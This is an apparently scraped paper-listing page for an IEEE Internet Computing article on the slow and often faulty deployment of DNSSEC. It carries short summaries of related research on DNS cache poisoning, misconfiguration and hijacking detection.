Retrofitting Security into Network Protocols: The Case of DNSSEC

  title={Retrofitting Security into Network Protocols: The Case of DNSSEC},
  author={Amir Herzberg and Haya Shulman},
  journal={IEEE Internet Computing},
DNS Security Extensions (DNSSEC) became standardized more than 15 years ago, but its adoption is still limited. The recent publication of several new, off-path DNS cache-poisoning and wide-scale man-in-the-middle attacks should motivate DNSSEC adoption. However, significant challenges and pitfalls have resulted in severely limited deployment, which is furthermore often incorrect (and hence vulnerable). The authors outline these problems and suggest directions for improvement and further… 

Tables from this paper

DNSSEC Misconfigurations in Popular Domains

DNSSEC was designed to protect the Domain Name System (DNS) against DNS cache poisoning and domain hijacking and is expected to facilitate a multitude of future applications and systems that would use the DNS for distribution of security tokens.

POSTER: On the Resilience of DNS Infrastructure

It is indicated that common configuration choices, that domain operators make, result in a fragile DNS infrastructure, susceptible to malicious attacks and benign failures, and recommendations are provided for improving robustness of DNS.

Fragmentation Considered Leaking: Port Inference for DNS Poisoning

Internet systems and networks have a long history of attacks by off-path adversaries that subvert the correctness and availability of Internet services and, among others, were applied for DNS cache poisoning, TCP injections, reflection DDoS attacks.

Is the Internet Ready for DNSSEC: Evaluating Pitfalls in the Naming Infrastructure

The evaluation results indicate that DNSSEC deployment is a cost-benefit decision, and full adoption thereof requires upgrading significant parts of the DNS infrastructure, including legacy infrastructure, and lack of protocol support.

DNS authentication as a service: preventing amplification attacks

The proposed DNS-authentication system is efficient, and effectively prevents DNS-based amplification DoS attacks abusing DNS name servers, and a game-theoretic model and analysis is presented, predicting a wide-spread adoption of the design.

Towards Security of Internet Naming Infrastructure

The experimental evaluation indicates that the caching infrastructures are typically run bythird parties, and that the services, provided by the third parties, often do not deploy best practices, resulting in misconfigurations, vulnerabilities and degraded performance of the DNS servers in popular domains.

Pretty Bad Privacy: Pitfalls of DNS Encryption

This work indicates that further study may be required to adjust the proposals for end-to-end encryption to stand up to their security guarantees, and to make them suitable for the common servers' configurations in the DNS infrastructure.

DNS-IDS: Securing DNS in the Cloud Era

An anomaly based Intrusion Detection System (IDS) for the DNS protocol (DNS-IDS) that models the normal operations of the DNS Protocol and accurately detects any abnormal behavior or exploitation of the protocol is presented.

Detection and Forensics of Domains Hijacking

This work designed and developed a system, called LUDIC (LookUp DIstributed Cache), for detection of domain hijacking attacks, which enables forensic analysis and provides victims with signed evidences allowing them to prove breaches to third parties, such as a court of law or a resolution authority.

On the Impact of DNS Over HTTPS Paradigm on Cyber Systems

  • Kimo BumanglagH. Kettani
  • Computer Science
    2020 3rd International Conference on Information and Computer Technologies (ICICT)
  • 2020
The weaknesses of the DNS protocol are reviewed and how malware has abused those weaknesses, enhancements to DNS security, andHow malware uses DNS and how that use is detected are reviewed, with a special emphasis on the effects that DNS over HTTPS may have on an organization's security.



Vulnerable Delegation of DNS Resolution

A growing number of networks delegate their DNS resolution to trusted upstream resolver to improve the resilience of the resolvers to cache-poisoning and DoS attacks, and also to provide other security, performance, reliability and management advantages.

Security of Patched DNS

This work investigates the prominent patches to DNS, and shows how attackers can circumvent all of them, namely: 16 bit identifier field, and other fields, randomised and validated by different ‘patches’ to DNS.

Measuring the Practical Impact of DNSSEC Deployment

A large-scale measurement of the effects of DNSSEC on client name resolution using an ad network to collect results from over 500,000 geographically-distributed clients shows that enablingDNSSEC measurably increases end-to-end resolution failures and corroborates those of previous researchers in showing that a relatively small fraction of users are protected by DNSSec-validating resolvers.

Off-Path Hacking: The Illusion of Challenge-Response Authentication

Recent off-path TCP injection and DNS poisoning attacks enable attackers to circumvent existing challenge-response defenses and foil widely deployed security mechanisms and allow a wide range of exploits, such as long-term caching of malicious objects and scripts.

Fragmentation Considered Poisonous, or:

Off-path DNS cache poisoning attacks, circumventing widely-deployed challenge-response defenses, e.g., transaction identifier randomisation, port and query randomisation are presented, resulting in IP fragmentation.

Socket overloading for fun and cache-poisoning

It is shown how to apply socket overloading for DNS cache poisoning and name server pinning against popular systems that support algorithms recommended in [RFC6056] and [RFC4097] respectively.

IC-18-01-Standards.indd 71 10

  • IC-18-01-Standards.indd 71 10

It's the End of the Cache as We Know It Black Hat Conf

  • It's the End of the Cache as We Know It Black Hat Conf
  • 2008

Fax: +1 714 821 4010 Advertising Sales Representatives (display) Central, Northwest, Far East: Eric Kincaid Email: Phone

  • Fax: +1 714 821 4010 Advertising Sales Representatives (display) Central, Northwest, Far East: Eric Kincaid Email: Phone

Advertising Coordinator; Email: Phone: +1 714 816 2139 | Fax: +1 714 821 4010 Sandy Brown: Sr. Business Development Mgr

  • Advertising Coordinator; Email: Phone: +1 714 816 2139 | Fax: +1 714 821 4010 Sandy Brown: Sr. Business Development Mgr